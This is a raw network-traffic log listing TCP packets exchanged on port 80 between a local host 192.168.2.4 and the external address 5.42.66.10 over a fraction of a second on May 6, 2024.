May 6, 2024 07:53:04.521938086 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521949053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521949053 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.521960974 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521975994 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.521981955 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521995068 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.521996975 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.522022009 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.522048950 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.522077084 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522089958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522100925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522111893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522115946 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.522124052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522133112 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.522135973 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522147894 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522159100 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522169113 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.522171974 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522183895 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522192001 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.522196054 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522207975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522211075 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.522238016 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.522252083 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522264004 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522265911 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.522275925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522286892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522296906 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.522300005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522313118 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522330999 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.522349119 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.522382021 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522393942 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522403955 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522417068 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522423029 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.522428036 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522439957 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522450924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522452116 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.522464037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522475004 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522486925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522486925 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.522499084 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522509098 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.522511005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522521973 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522536039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522536993 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.522547960 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522558928 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522569895 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.522571087 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522583008 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522592068 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.522593975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522605896 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522614002 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.522619009 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522629976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522634983 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.522651911 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522658110 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.522664070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522675991 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.522703886 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.522706985 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522718906 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522730112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522741079 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522746086 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.522753000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522763968 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522773981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522779942 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.522784948 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522797108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522814035 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522821903 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.522830009 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.522830009 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522842884 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522854090 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522865057 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.522866964 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522877932 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522897005 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.522917032 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.522942066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522953987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522964001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522975922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.522981882 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.522989035 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523000956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523010969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523013115 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.523020983 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523032904 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523044109 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.523045063 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523056984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523061991 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.523080111 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523083925 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.523092985 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523102999 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.523104906 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523133993 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523137093 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.523147106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523156881 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523164034 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.523179054 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523190975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523195982 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.523202896 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523216009 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523226023 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.523227930 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523240089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523247004 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.523252010 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523277998 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.523307085 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.523313046 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523324013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523336887 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523348093 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523354053 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.523360014 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523370981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523375034 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.523401022 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.523417950 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.523447037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523458958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523468971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523479939 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523488998 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.523490906 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523503065 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523508072 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.523515940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523526907 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523538113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523540974 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.523565054 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.523576975 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.523580074 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523597956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523605108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523614883 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523627996 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523639917 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.523641109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523655891 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523667097 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523668051 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.523686886 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.523688078 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523699999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523710012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523718119 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.523721933 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523735046 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523746014 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523751974 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.523757935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523771048 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.523780107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523788929 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.523792982 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523804903 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523821115 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.523849964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.523881912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523893118 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523902893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523914099 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523926020 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523926020 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.523937941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523938894 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.523948908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523962021 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523972988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523979902 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.523986101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.523998022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524008989 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524013042 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524029970 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524034023 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524043083 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524055004 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524061918 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524065971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524080992 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524092913 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524111986 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524147034 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524158001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524168968 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524179935 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524184942 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524192095 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524204016 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524214029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524218082 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524233103 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524245024 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524245977 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524259090 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524265051 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524272919 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524285078 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524291039 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524322987 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524327993 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524338961 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524350882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524363041 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524367094 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524374962 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524396896 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524418116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524425030 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524432898 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524445057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524456978 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524457932 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524468899 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524480104 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524485111 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524492025 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524502993 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524509907 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524516106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524528027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524530888 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524538994 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524548054 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524549961 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524563074 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524568081 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524574995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524593115 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524616957 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524625063 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524636984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524650097 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524662018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524663925 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524674892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524687052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524693966 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524694920 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524707079 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524719000 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524739027 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524755955 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524766922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524780035 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524790049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524802923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524811029 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524813890 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524827003 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524835110 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524849892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524862051 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524862051 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524873972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524885893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524885893 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524898052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524903059 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524910927 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524921894 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524925947 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524933100 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524944067 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524950981 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524955988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524966955 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524971962 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524979115 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.524987936 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.524991989 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525005102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525012016 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525017023 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525039911 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525053024 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525105000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525115967 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525127888 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525140047 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525140047 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525152922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525158882 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525165081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525178909 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525190115 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525192976 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525198936 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525202990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525213003 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525226116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525228977 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525237083 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525259018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525263071 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525269985 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525273085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525284052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525296926 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525296926 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525309086 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525320053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525321960 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525341034 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525363922 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525408983 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525420904 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525430918 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525444984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525450945 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525458097 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525470018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525479078 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525481939 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525496960 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525502920 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525509119 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525516033 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525533915 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.525542974 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.525552988 CEST	80	49741	5.42.66.10	192.168.2.4
